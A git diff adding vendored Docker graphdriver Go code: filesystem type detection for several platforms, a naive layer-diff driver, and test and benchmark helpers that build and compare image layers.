+ FsNames = map[FsMagic]string{ + FsMagicAufs: "aufs", + FsMagicBtrfs: "btrfs", + FsMagicCramfs: "cramfs", + FsMagicExtfs: "extfs", + FsMagicF2fs: "f2fs", + FsMagicGPFS: "gpfs", + FsMagicJffs2Fs: "jffs2", + FsMagicJfs: "jfs", + FsMagicNfsFs: "nfs", + FsMagicOverlay: "overlayfs", + FsMagicRAMFs: "ramfs", + FsMagicReiserFs: "reiserfs", + FsMagicSmbFs: "smb", + FsMagicSquashFs: "squashfs", + FsMagicTmpFs: "tmpfs", + FsMagicUnsupported: "unsupported", + FsMagicVxFS: "vxfs", + FsMagicXfs: "xfs", + FsMagicZfs: "zfs", + } +) + +// GetFSMagic returns the filesystem id given the path. +func GetFSMagic(rootpath string) (FsMagic, error) { + var buf syscall.Statfs_t + if err := syscall.Statfs(filepath.Dir(rootpath), &buf); err != nil { + return 0, err + } + return FsMagic(buf.Type), nil +} + +// NewFsChecker returns a checker configured for the provied FsMagic +func NewFsChecker(t FsMagic) Checker { + return &fsChecker{ + t: t, + } +} + +type fsChecker struct { + t FsMagic +} + +func (c *fsChecker) IsMounted(path string) bool { + m, _ := Mounted(c.t, path) + return m +} + +// NewDefaultChecker returns a check that parses /proc/mountinfo to check +// if the specified path is mounted. 
+func NewDefaultChecker() Checker { + return &defaultChecker{} +} + +type defaultChecker struct { +} + +func (c *defaultChecker) IsMounted(path string) bool { + m, _ := mount.Mounted(path) + return m +} + +// Mounted checks if the given path is mounted as the fs type +func Mounted(fsType FsMagic, mountPath string) (bool, error) { + var buf syscall.Statfs_t + if err := syscall.Statfs(mountPath, &buf); err != nil { + return false, err + } + return FsMagic(buf.Type) == fsType, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go new file mode 100644 index 0000000000..7daf01c32d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go @@ -0,0 +1,97 @@ +// +build solaris,cgo + +package graphdriver + +/* +#include +#include + +static inline struct statvfs *getstatfs(char *s) { + struct statvfs *buf; + int err; + buf = (struct statvfs *)malloc(sizeof(struct statvfs)); + err = statvfs(s, buf); + return buf; +} +*/ +import "C" +import ( + "path/filepath" + "unsafe" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/mount" +) + +const ( + // FsMagicZfs filesystem id for Zfs + FsMagicZfs = FsMagic(0x2fc12fc1) +) + +var ( + // Slice of drivers that should be used in an order + priority = []string{ + "zfs", + } + + // FsNames maps filesystem id to name of the filesystem. + FsNames = map[FsMagic]string{ + FsMagicZfs: "zfs", + } +) + +// GetFSMagic returns the filesystem id given the path. 
+func GetFSMagic(rootpath string) (FsMagic, error) { + return 0, nil +} + +type fsChecker struct { + t FsMagic +} + +func (c *fsChecker) IsMounted(path string) bool { + m, _ := Mounted(c.t, path) + return m +} + +// NewFsChecker returns a checker configured for the provied FsMagic +func NewFsChecker(t FsMagic) Checker { + return &fsChecker{ + t: t, + } +} + +// NewDefaultChecker returns a check that parses /proc/mountinfo to check +// if the specified path is mounted. +// No-op on Solaris. +func NewDefaultChecker() Checker { + return &defaultChecker{} +} + +type defaultChecker struct { +} + +func (c *defaultChecker) IsMounted(path string) bool { + m, _ := mount.Mounted(path) + return m +} + +// Mounted checks if the given path is mounted as the fs type +//Solaris supports only ZFS for now +func Mounted(fsType FsMagic, mountPath string) (bool, error) { + + cs := C.CString(filepath.Dir(mountPath)) + buf := C.getstatfs(cs) + + // on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... ] + if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) || + (buf.f_basetype[3] != 0) { + logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", mountPath) + C.free(unsafe.Pointer(buf)) + return false, ErrPrerequisites + } + + C.free(unsafe.Pointer(buf)) + C.free(unsafe.Pointer(cs)) + return true, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go new file mode 100644 index 0000000000..4a875608b0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go @@ -0,0 +1,15 @@ +// +build !linux,!windows,!freebsd,!solaris + +package graphdriver + +var ( + // Slice of drivers that should be used in an order + priority = []string{ + "unsupported", + } +) + +// GetFSMagic returns the filesystem id given the path. 
+func GetFSMagic(rootpath string) (FsMagic, error) { + return FsMagicUnsupported, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go new file mode 100644 index 0000000000..ffd30c2950 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go @@ -0,0 +1,14 @@ +package graphdriver + +var ( + // Slice of drivers that should be used in order + priority = []string{ + "windowsfilter", + } +) + +// GetFSMagic returns the filesystem id given the path. +func GetFSMagic(rootpath string) (FsMagic, error) { + // Note it is OK to return FsMagicUnsupported on Windows. + return FsMagicUnsupported, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go new file mode 100644 index 0000000000..20826cd7d2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go @@ -0,0 +1,169 @@ +package graphdriver + +import ( + "io" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" +) + +var ( + // ApplyUncompressedLayer defines the unpack method used by the graph + // driver. + ApplyUncompressedLayer = chrootarchive.ApplyUncompressedLayer +) + +// NaiveDiffDriver takes a ProtoDriver and adds the +// capability of the Diffing methods which it may or may not +// support on its own. See the comment on the exported +// NewNaiveDiffDriver function below. +// Notably, the AUFS driver doesn't need to be wrapped like this. 
+type NaiveDiffDriver struct { + ProtoDriver + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap +} + +// NewNaiveDiffDriver returns a fully functional driver that wraps the +// given ProtoDriver and adds the capability of the following methods which +// it may or may not support on its own: +// Diff(id, parent string) (archive.Archive, error) +// Changes(id, parent string) ([]archive.Change, error) +// ApplyDiff(id, parent string, diff archive.Reader) (size int64, err error) +// DiffSize(id, parent string) (size int64, err error) +func NewNaiveDiffDriver(driver ProtoDriver, uidMaps, gidMaps []idtools.IDMap) Driver { + return &NaiveDiffDriver{ProtoDriver: driver, + uidMaps: uidMaps, + gidMaps: gidMaps} +} + +// Diff produces an archive of the changes between the specified +// layer and its parent layer which may be "". +func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err error) { + startTime := time.Now() + driver := gdw.ProtoDriver + + layerFs, err := driver.Get(id, "") + if err != nil { + return nil, err + } + + defer func() { + if err != nil { + driver.Put(id) + } + }() + + if parent == "" { + archive, err := archive.Tar(layerFs, archive.Uncompressed) + if err != nil { + return nil, err + } + return ioutils.NewReadCloserWrapper(archive, func() error { + err := archive.Close() + driver.Put(id) + return err + }), nil + } + + parentFs, err := driver.Get(parent, "") + if err != nil { + return nil, err + } + defer driver.Put(parent) + + changes, err := archive.ChangesDirs(layerFs, parentFs) + if err != nil { + return nil, err + } + + archive, err := archive.ExportChanges(layerFs, changes, gdw.uidMaps, gdw.gidMaps) + if err != nil { + return nil, err + } + + return ioutils.NewReadCloserWrapper(archive, func() error { + err := archive.Close() + driver.Put(id) + + // NaiveDiffDriver compares file metadata with parent layers. Parent layers + // are extracted from tar's with full second precision on modified time. 
+ // We need this hack here to make sure calls within same second receive + // correct result. + time.Sleep(startTime.Truncate(time.Second).Add(time.Second).Sub(time.Now())) + return err + }), nil +} + +// Changes produces a list of changes between the specified layer +// and its parent layer. If parent is "", then all changes will be ADD changes. +func (gdw *NaiveDiffDriver) Changes(id, parent string) ([]archive.Change, error) { + driver := gdw.ProtoDriver + + layerFs, err := driver.Get(id, "") + if err != nil { + return nil, err + } + defer driver.Put(id) + + parentFs := "" + + if parent != "" { + parentFs, err = driver.Get(parent, "") + if err != nil { + return nil, err + } + defer driver.Put(parent) + } + + return archive.ChangesDirs(layerFs, parentFs) +} + +// ApplyDiff extracts the changeset from the given diff into the +// layer with the specified id and parent, returning the size of the +// new layer in bytes. +func (gdw *NaiveDiffDriver) ApplyDiff(id, parent string, diff io.Reader) (size int64, err error) { + driver := gdw.ProtoDriver + + // Mount the root filesystem so we can apply the diff/layer. + layerFs, err := driver.Get(id, "") + if err != nil { + return + } + defer driver.Put(id) + + options := &archive.TarOptions{UIDMaps: gdw.uidMaps, + GIDMaps: gdw.gidMaps} + start := time.Now().UTC() + logrus.Debug("Start untar layer") + if size, err = ApplyUncompressedLayer(layerFs, diff, options); err != nil { + return + } + logrus.Debugf("Untar time: %vs", time.Now().UTC().Sub(start).Seconds()) + + return +} + +// DiffSize calculates the changes between the specified layer +// and its parent and returns the size in bytes of the changes +// relative to its base filesystem directory. 
+func (gdw *NaiveDiffDriver) DiffSize(id, parent string) (size int64, err error) { + driver := gdw.ProtoDriver + + changes, err := gdw.Changes(id, parent) + if err != nil { + return + } + + layerFs, err := driver.Get(id, "") + if err != nil { + return + } + defer driver.Put(id) + + return archive.ChangesSize(layerFs, changes), nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go new file mode 100644 index 0000000000..def822b9a1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go @@ -0,0 +1,259 @@ +// +build linux freebsd + +package graphtest + +import ( + "bytes" + "io" + "io/ioutil" + "path/filepath" + "testing" + + "github.com/docker/docker/pkg/stringid" +) + +// DriverBenchExists benchmarks calls to exist +func DriverBenchExists(b *testing.B, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + + base := stringid.GenerateRandomID() + + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + b.ResetTimer() + for i := 0; i < b.N; i++ { + if !driver.Exists(base) { + b.Fatal("Newly created image doesn't exist") + } + } +} + +// DriverBenchGetEmpty benchmarks calls to get on an empty layer +func DriverBenchGetEmpty(b *testing.B, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) 
+ defer PutDriver(b) + + base := stringid.GenerateRandomID() + + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + b.ResetTimer() + for i := 0; i < b.N; i++ { + _, err := driver.Get(base, "") + b.StopTimer() + if err != nil { + b.Fatalf("Error getting mount: %s", err) + } + if err := driver.Put(base); err != nil { + b.Fatalf("Error putting mount: %s", err) + } + b.StartTimer() + } +} + +// DriverBenchDiffBase benchmarks calls to diff on a root layer +func DriverBenchDiffBase(b *testing.B, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + + base := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + if err := addFiles(driver, base, 3); err != nil { + b.Fatal(err) + } + + b.ResetTimer() + for i := 0; i < b.N; i++ { + arch, err := driver.Diff(base, "") + if err != nil { + b.Fatal(err) + } + _, err = io.Copy(ioutil.Discard, arch) + if err != nil { + b.Fatalf("Error copying archive: %s", err) + } + arch.Close() + } +} + +// DriverBenchDiffN benchmarks calls to diff on two layers with +// a provided number of files on the lower and upper layers. +func DriverBenchDiffN(b *testing.B, bottom, top int, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) 
+ defer PutDriver(b) + base := stringid.GenerateRandomID() + upper := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + if err := addManyFiles(driver, base, bottom, 3); err != nil { + b.Fatal(err) + } + + if err := driver.Create(upper, base, nil); err != nil { + b.Fatal(err) + } + + if err := addManyFiles(driver, upper, top, 6); err != nil { + b.Fatal(err) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + arch, err := driver.Diff(upper, "") + if err != nil { + b.Fatal(err) + } + _, err = io.Copy(ioutil.Discard, arch) + if err != nil { + b.Fatalf("Error copying archive: %s", err) + } + arch.Close() + } +} + +// DriverBenchDiffApplyN benchmarks calls to diff and apply together +func DriverBenchDiffApplyN(b *testing.B, fileCount int, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + base := stringid.GenerateRandomID() + upper := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + if err := addManyFiles(driver, base, fileCount, 3); err != nil { + b.Fatal(err) + } + + if err := driver.Create(upper, base, nil); err != nil { + b.Fatal(err) + } + + if err := addManyFiles(driver, upper, fileCount, 6); err != nil { + b.Fatal(err) + } + diffSize, err := driver.DiffSize(upper, "") + if err != nil { + b.Fatal(err) + } + b.ResetTimer() + b.StopTimer() + for i := 0; i < b.N; i++ { + diff := stringid.GenerateRandomID() + if err := driver.Create(diff, base, nil); err != nil { + b.Fatal(err) + } + + if err := checkManyFiles(driver, diff, fileCount, 3); err != nil { + b.Fatal(err) + } + + b.StartTimer() + + arch, err := driver.Diff(upper, "") + if err != nil { + b.Fatal(err) + } + + applyDiffSize, err := driver.ApplyDiff(diff, "", arch) + if err != nil { + b.Fatal(err) + } + + b.StopTimer() + arch.Close() + + if applyDiffSize != diffSize { + // TODO: enforce this + //b.Fatalf("Apply diff size 
different, got %d, expected %s", applyDiffSize, diffSize) + } + if err := checkManyFiles(driver, diff, fileCount, 6); err != nil { + b.Fatal(err) + } + } +} + +// DriverBenchDeepLayerDiff benchmarks calls to diff on top of a given number of layers. +func DriverBenchDeepLayerDiff(b *testing.B, layerCount int, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + + base := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + if err := addFiles(driver, base, 50); err != nil { + b.Fatal(err) + } + + topLayer, err := addManyLayers(driver, base, layerCount) + if err != nil { + b.Fatal(err) + } + + b.ResetTimer() + for i := 0; i < b.N; i++ { + arch, err := driver.Diff(topLayer, "") + if err != nil { + b.Fatal(err) + } + _, err = io.Copy(ioutil.Discard, arch) + if err != nil { + b.Fatalf("Error copying archive: %s", err) + } + arch.Close() + } +} + +// DriverBenchDeepLayerRead benchmarks calls to read a file under a given number of layers. +func DriverBenchDeepLayerRead(b *testing.B, layerCount int, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) 
+ defer PutDriver(b) + + base := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + content := []byte("test content") + if err := addFile(driver, base, "testfile.txt", content); err != nil { + b.Fatal(err) + } + + topLayer, err := addManyLayers(driver, base, layerCount) + if err != nil { + b.Fatal(err) + } + + root, err := driver.Get(topLayer, "") + if err != nil { + b.Fatal(err) + } + defer driver.Put(topLayer) + + b.ResetTimer() + for i := 0; i < b.N; i++ { + + // Read content + c, err := ioutil.ReadFile(filepath.Join(root, "testfile.txt")) + if err != nil { + b.Fatal(err) + } + + b.StopTimer() + if bytes.Compare(c, content) != 0 { + b.Fatalf("Wrong content in file %v, expected %v", c, content) + } + b.StartTimer() + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go new file mode 100644 index 0000000000..6e952de78b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go @@ -0,0 +1,358 @@ +// +build linux freebsd solaris + +package graphtest + +import ( + "bytes" + "io/ioutil" + "math/rand" + "os" + "path" + "reflect" + "syscall" + "testing" + "unsafe" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-units" +) + +var ( + drv *Driver +) + +// Driver conforms to graphdriver.Driver interface and +// contains information such as root and reference count of the number of clients using it. +// This helps in testing drivers added into the framework. 
+type Driver struct { + graphdriver.Driver + root string + refCount int +} + +func newDriver(t testing.TB, name string, options []string) *Driver { + root, err := ioutil.TempDir("", "docker-graphtest-") + if err != nil { + t.Fatal(err) + } + + if err := os.MkdirAll(root, 0755); err != nil { + t.Fatal(err) + } + + d, err := graphdriver.GetDriver(name, nil, graphdriver.Options{DriverOptions: options, Root: root}) + if err != nil { + t.Logf("graphdriver: %v\n", err) + if err == graphdriver.ErrNotSupported || err == graphdriver.ErrPrerequisites || err == graphdriver.ErrIncompatibleFS { + t.Skipf("Driver %s not supported", name) + } + t.Fatal(err) + } + return &Driver{d, root, 1} +} + +func cleanup(t testing.TB, d *Driver) { + if err := drv.Cleanup(); err != nil { + t.Fatal(err) + } + os.RemoveAll(d.root) +} + +// GetDriver create a new driver with given name or return an existing driver with the name updating the reference count. +func GetDriver(t testing.TB, name string, options ...string) graphdriver.Driver { + if drv == nil { + drv = newDriver(t, name, options) + } else { + drv.refCount++ + } + return drv +} + +// PutDriver removes the driver if it is no longer used and updates the reference count. +func PutDriver(t testing.TB) { + if drv == nil { + t.Skip("No driver to put!") + } + drv.refCount-- + if drv.refCount == 0 { + cleanup(t, drv) + drv = nil + } +} + +// DriverTestCreateEmpty creates a new image and verifies it is empty and the right metadata +func DriverTestCreateEmpty(t testing.TB, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) 
+ defer PutDriver(t) + + if err := driver.Create("empty", "", nil); err != nil { + t.Fatal(err) + } + + defer func() { + if err := driver.Remove("empty"); err != nil { + t.Fatal(err) + } + }() + + if !driver.Exists("empty") { + t.Fatal("Newly created image doesn't exist") + } + + dir, err := driver.Get("empty", "") + if err != nil { + t.Fatal(err) + } + + verifyFile(t, dir, 0755|os.ModeDir, 0, 0) + + // Verify that the directory is empty + fis, err := readDir(dir) + if err != nil { + t.Fatal(err) + } + + if len(fis) != 0 { + t.Fatal("New directory not empty") + } + + driver.Put("empty") +} + +// DriverTestCreateBase create a base driver and verify. +func DriverTestCreateBase(t testing.TB, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) + defer PutDriver(t) + + createBase(t, driver, "Base") + defer func() { + if err := driver.Remove("Base"); err != nil { + t.Fatal(err) + } + }() + verifyBase(t, driver, "Base") +} + +// DriverTestCreateSnap Create a driver and snap and verify. +func DriverTestCreateSnap(t testing.TB, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) + defer PutDriver(t) + + createBase(t, driver, "Base") + + defer func() { + if err := driver.Remove("Base"); err != nil { + t.Fatal(err) + } + }() + + if err := driver.Create("Snap", "Base", nil); err != nil { + t.Fatal(err) + } + + defer func() { + if err := driver.Remove("Snap"); err != nil { + t.Fatal(err) + } + }() + + verifyBase(t, driver, "Snap") +} + +// DriverTestDeepLayerRead reads a file from a lower layer under a given number of layers +func DriverTestDeepLayerRead(t testing.TB, layerCount int, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) 
+ defer PutDriver(t) + + base := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + t.Fatal(err) + } + + content := []byte("test content") + if err := addFile(driver, base, "testfile.txt", content); err != nil { + t.Fatal(err) + } + + topLayer, err := addManyLayers(driver, base, layerCount) + if err != nil { + t.Fatal(err) + } + + err = checkManyLayers(driver, topLayer, layerCount) + if err != nil { + t.Fatal(err) + } + + if err := checkFile(driver, topLayer, "testfile.txt", content); err != nil { + t.Fatal(err) + } +} + +// DriverTestDiffApply tests diffing and applying produces the same layer +func DriverTestDiffApply(t testing.TB, fileCount int, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) + defer PutDriver(t) + base := stringid.GenerateRandomID() + upper := stringid.GenerateRandomID() + deleteFile := "file-remove.txt" + deleteFileContent := []byte("This file should get removed in upper!") + deleteDir := "var/lib" + + if err := driver.Create(base, "", nil); err != nil { + t.Fatal(err) + } + + if err := addManyFiles(driver, base, fileCount, 3); err != nil { + t.Fatal(err) + } + + if err := addFile(driver, base, deleteFile, deleteFileContent); err != nil { + t.Fatal(err) + } + + if err := addDirectory(driver, base, deleteDir); err != nil { + t.Fatal(err) + } + + if err := driver.Create(upper, base, nil); err != nil { + t.Fatal(err) + } + + if err := addManyFiles(driver, upper, fileCount, 6); err != nil { + t.Fatal(err) + } + + if err := removeAll(driver, upper, deleteFile, deleteDir); err != nil { + t.Fatal(err) + } + + diffSize, err := driver.DiffSize(upper, "") + if err != nil { + t.Fatal(err) + } + + diff := stringid.GenerateRandomID() + if err := driver.Create(diff, base, nil); err != nil { + t.Fatal(err) + } + + if err := checkManyFiles(driver, diff, fileCount, 3); err != nil { + t.Fatal(err) + } + + if err := checkFile(driver, diff, deleteFile, deleteFileContent); err 
!= nil { + t.Fatal(err) + } + + arch, err := driver.Diff(upper, base) + if err != nil { + t.Fatal(err) + } + + buf := bytes.NewBuffer(nil) + if _, err := buf.ReadFrom(arch); err != nil { + t.Fatal(err) + } + if err := arch.Close(); err != nil { + t.Fatal(err) + } + + applyDiffSize, err := driver.ApplyDiff(diff, base, bytes.NewReader(buf.Bytes())) + if err != nil { + t.Fatal(err) + } + + if applyDiffSize != diffSize { + t.Fatalf("Apply diff size different, got %d, expected %d", applyDiffSize, diffSize) + } + + if err := checkManyFiles(driver, diff, fileCount, 6); err != nil { + t.Fatal(err) + } + + if err := checkFileRemoved(driver, diff, deleteFile); err != nil { + t.Fatal(err) + } + + if err := checkFileRemoved(driver, diff, deleteDir); err != nil { + t.Fatal(err) + } +} + +// DriverTestChanges tests computed changes on a layer matches changes made +func DriverTestChanges(t testing.TB, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) + defer PutDriver(t) + base := stringid.GenerateRandomID() + upper := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + t.Fatal(err) + } + + if err := addManyFiles(driver, base, 20, 3); err != nil { + t.Fatal(err) + } + + if err := driver.Create(upper, base, nil); err != nil { + t.Fatal(err) + } + + expectedChanges, err := changeManyFiles(driver, upper, 20, 6) + if err != nil { + t.Fatal(err) + } + + changes, err := driver.Changes(upper, base) + if err != nil { + t.Fatal(err) + } + + if err = checkChanges(expectedChanges, changes); err != nil { + t.Fatal(err) + } +} + +func writeRandomFile(path string, size uint64) error { + buf := make([]int64, size/8) + + r := rand.NewSource(0) + for i := range buf { + buf[i] = r.Int63() + } + + // Cast to []byte + header := *(*reflect.SliceHeader)(unsafe.Pointer(&buf)) + header.Len *= 8 + header.Cap *= 8 + data := *(*[]byte)(unsafe.Pointer(&header)) + + return ioutil.WriteFile(path, data, 0700) +} + +// 
DriverTestSetQuota Create a driver and test setting quota. +func DriverTestSetQuota(t *testing.T, drivername string) { + driver := GetDriver(t, drivername) + defer PutDriver(t) + + createBase(t, driver, "Base") + createOpts := &graphdriver.CreateOpts{} + createOpts.StorageOpt = make(map[string]string, 1) + createOpts.StorageOpt["size"] = "50M" + if err := driver.Create("zfsTest", "Base", createOpts); err != nil { + t.Fatal(err) + } + + mountPath, err := driver.Get("zfsTest", "") + if err != nil { + t.Fatal(err) + } + + quota := uint64(50 * units.MiB) + err = writeRandomFile(path.Join(mountPath, "file"), quota*2) + if pathError, ok := err.(*os.PathError); ok && pathError.Err != syscall.EDQUOT { + t.Fatalf("expect write() to fail with %v, got %v", syscall.EDQUOT, err) + } + +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go new file mode 100644 index 0000000000..a50c5211e3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go @@ -0,0 +1 @@ +package graphtest diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go new file mode 100644 index 0000000000..35bf6d17ba --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go @@ -0,0 +1,342 @@ +package graphtest + +import ( + "bytes" + "fmt" + "io/ioutil" + "math/rand" + "os" + "path" + "sort" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/stringid" +) + +func randomContent(size int, seed int64) []byte { + s := rand.NewSource(seed) + content := make([]byte, size) + + for i := 0; i < len(content); i += 7 { + val := s.Int63() + for j := 0; i+j < len(content) && j < 7; j++ { + content[i+j] = byte(val) + val >>= 8 + } + } + + return content 
+} + +func addFiles(drv graphdriver.Driver, layer string, seed int64) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + if err := ioutil.WriteFile(path.Join(root, "file-a"), randomContent(64, seed), 0755); err != nil { + return err + } + if err := os.MkdirAll(path.Join(root, "dir-b"), 0755); err != nil { + return err + } + if err := ioutil.WriteFile(path.Join(root, "dir-b", "file-b"), randomContent(128, seed+1), 0755); err != nil { + return err + } + + return ioutil.WriteFile(path.Join(root, "file-c"), randomContent(128*128, seed+2), 0755) +} + +func checkFile(drv graphdriver.Driver, layer, filename string, content []byte) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + fileContent, err := ioutil.ReadFile(path.Join(root, filename)) + if err != nil { + return err + } + + if bytes.Compare(fileContent, content) != 0 { + return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content) + } + + return nil +} + +func addFile(drv graphdriver.Driver, layer, filename string, content []byte) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + return ioutil.WriteFile(path.Join(root, filename), content, 0755) +} + +func addDirectory(drv graphdriver.Driver, layer, dir string) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + return os.MkdirAll(path.Join(root, dir), 0755) +} + +func removeAll(drv graphdriver.Driver, layer string, names ...string) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + for _, filename := range names { + if err := os.RemoveAll(path.Join(root, filename)); err != nil { + return err + } + } + return nil +} + +func checkFileRemoved(drv graphdriver.Driver, layer, filename string) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer 
drv.Put(layer) + + if _, err := os.Stat(path.Join(root, filename)); err == nil { + return fmt.Errorf("file still exists: %s", path.Join(root, filename)) + } else if !os.IsNotExist(err) { + return err + } + + return nil +} + +func addManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + for i := 0; i < count; i += 100 { + dir := path.Join(root, fmt.Sprintf("directory-%d", i)) + if err := os.MkdirAll(dir, 0755); err != nil { + return err + } + for j := 0; i+j < count && j < 100; j++ { + file := path.Join(dir, fmt.Sprintf("file-%d", i+j)) + if err := ioutil.WriteFile(file, randomContent(64, seed+int64(i+j)), 0755); err != nil { + return err + } + } + } + + return nil +} + +func changeManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) ([]archive.Change, error) { + root, err := drv.Get(layer, "") + if err != nil { + return nil, err + } + defer drv.Put(layer) + + changes := []archive.Change{} + for i := 0; i < count; i += 100 { + archiveRoot := fmt.Sprintf("/directory-%d", i) + if err := os.MkdirAll(path.Join(root, archiveRoot), 0755); err != nil { + return nil, err + } + for j := 0; i+j < count && j < 100; j++ { + if j == 0 { + changes = append(changes, archive.Change{ + Path: archiveRoot, + Kind: archive.ChangeModify, + }) + } + var change archive.Change + switch j % 3 { + // Update file + case 0: + change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) + change.Kind = archive.ChangeModify + if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { + return nil, err + } + // Add file + case 1: + change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d-%d", seed, i+j)) + change.Kind = archive.ChangeAdd + if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { + return nil, err + } + // Remove file + case 2: + 
change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) + change.Kind = archive.ChangeDelete + if err := os.Remove(path.Join(root, change.Path)); err != nil { + return nil, err + } + } + changes = append(changes, change) + } + } + + return changes, nil +} + +func checkManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + for i := 0; i < count; i += 100 { + dir := path.Join(root, fmt.Sprintf("directory-%d", i)) + for j := 0; i+j < count && j < 100; j++ { + file := path.Join(dir, fmt.Sprintf("file-%d", i+j)) + fileContent, err := ioutil.ReadFile(file) + if err != nil { + return err + } + + content := randomContent(64, seed+int64(i+j)) + + if bytes.Compare(fileContent, content) != 0 { + return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content) + } + } + } + + return nil +} + +type changeList []archive.Change + +func (c changeList) Less(i, j int) bool { + if c[i].Path == c[j].Path { + return c[i].Kind < c[j].Kind + } + return c[i].Path < c[j].Path +} +func (c changeList) Len() int { return len(c) } +func (c changeList) Swap(i, j int) { c[j], c[i] = c[i], c[j] } + +func checkChanges(expected, actual []archive.Change) error { + if len(expected) != len(actual) { + return fmt.Errorf("unexpected number of changes, expected %d, got %d", len(expected), len(actual)) + } + sort.Sort(changeList(expected)) + sort.Sort(changeList(actual)) + + for i := range expected { + if expected[i] != actual[i] { + return fmt.Errorf("unexpected change, expecting %v, got %v", expected[i], actual[i]) + } + } + + return nil +} + 